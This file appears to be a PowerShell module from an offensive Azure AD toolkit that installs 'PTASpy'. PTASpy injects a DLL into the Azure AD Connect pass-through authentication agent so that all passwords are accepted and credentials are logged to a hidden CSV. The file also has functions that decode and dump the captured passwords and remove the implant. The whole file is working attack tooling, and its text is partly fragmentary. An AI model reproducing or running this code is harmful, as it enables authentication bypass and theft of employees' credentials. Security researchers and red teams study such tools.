
# PTASpy functions

# Some constants
$serviceName = "AzureADConnectAuthenticationAgent"
$processName = "AzureADConnectAuthenticationAgentService"

# May 20th 2019
function Install-PTASpy
    Installs PTASpy to the current computer.

    Installs PTASpy to the current computer. PTASpy collects credentials to C:\PTASpy.log and accepts all passwords.


        # Check that the process is running..
        $process = Get-Process -Name $processName -ErrorAction SilentlyContinue
            Write-Error "This command needs to be run on a computer with Azure AD Authentication Agent running (AzureADConnectAuthenticationAgentService.exe)."

        # Check the dependencies..
        if([String]::IsNullOrEmpty((Get-ChildItem -Path HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall | Get-ItemProperty | Where-Object {$_.DisplayName -like "Microsoft Visual C++ 2015 Redistributable (x64)*"})))
            Write-Warning "Microsoft Visual C++ 2015 Redistributable (x64) seems not to be installed! If PTASpy installation fails, install from:"

        $processId = $process.Id
        $promptValue = Read-Host "Are you sure you wan't to install PTASpy to this computer? Type YES to continue or CTRL+C to abort"
        if($promptValue -eq "yes")
            Write-Verbose "Creating and hiding directory C:\PTASpy"
            $PTASpyDir = New-Item -ItemType Directory -Force -Path C:\PTASpy 
            $PTASpyDir.Attributes += "Hidden"

            Write-Verbose "Copying PTASpy.dll to C:\PTASpy\"
                Copy-Item "$PSScriptRoot\PTASpy.dll" "C:\PTASpy\" -Force
                Write-Error "Could not copy PTASpy.dll to C:\PTASPy - Try running Remove-AADIntPTASpy and try again"
            $result=Inject-DLL -ProcessID $processID -FileName "C:\PTASpy\PTASpy.dll"
            Write-Verbose "Inject-DLL result: $result"
            if($result -like "*success*")
                Write-Host "Installation successfully completed!"
                Write-Host "All passwords are now accepted and credentials collected to C:\PTASpy\PTASpy.csv"
                Write-Error "Installation failed: $result"

# May 20th 2019
function Remove-PTASpy
    Removes PTASpy from the current computer

    Removes PTASpy from the current computer by restarting AzureADConnectAuthenticationAgentService service.


        $service = Get-Service -Name $serviceName -ErrorAction SilentlyContinue
            Write-Error "This command needs to be run on a computer with Azure AD Authentication Agent service (AzureADConnectAuthenticationAgent)"

        Restart-Service $serviceName
        Write-Verbose "Removing C:\PTASpy\PTASpy.dll"

        Remove-Item "C:\PTASpy\PTASpy.dll" -Force

        Write-Host "Service restarted and C:\PTASpy\PTASpy.dll removed."

# May 20th 2019
function Get-PTASpyLog
    Dumps credentials collected by PTASpy

    Dumps credentials from C:\PTASpy.csv collected by PTASpy and deletes the file if requested


        $fileName = "C:\PTASpy\PTASpy.csv"
        $fileContent = Get-Content $fileName

        foreach($row in $fileContent)
                $values = $row.Split(",")
                    $attributes["Password"]=[System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String($values[3]))
                # epoch from AccessToken_utils = 1.1.1970 00:00
                New-Object PSObject -Property $attributes
            Remove-Item $fileName -Force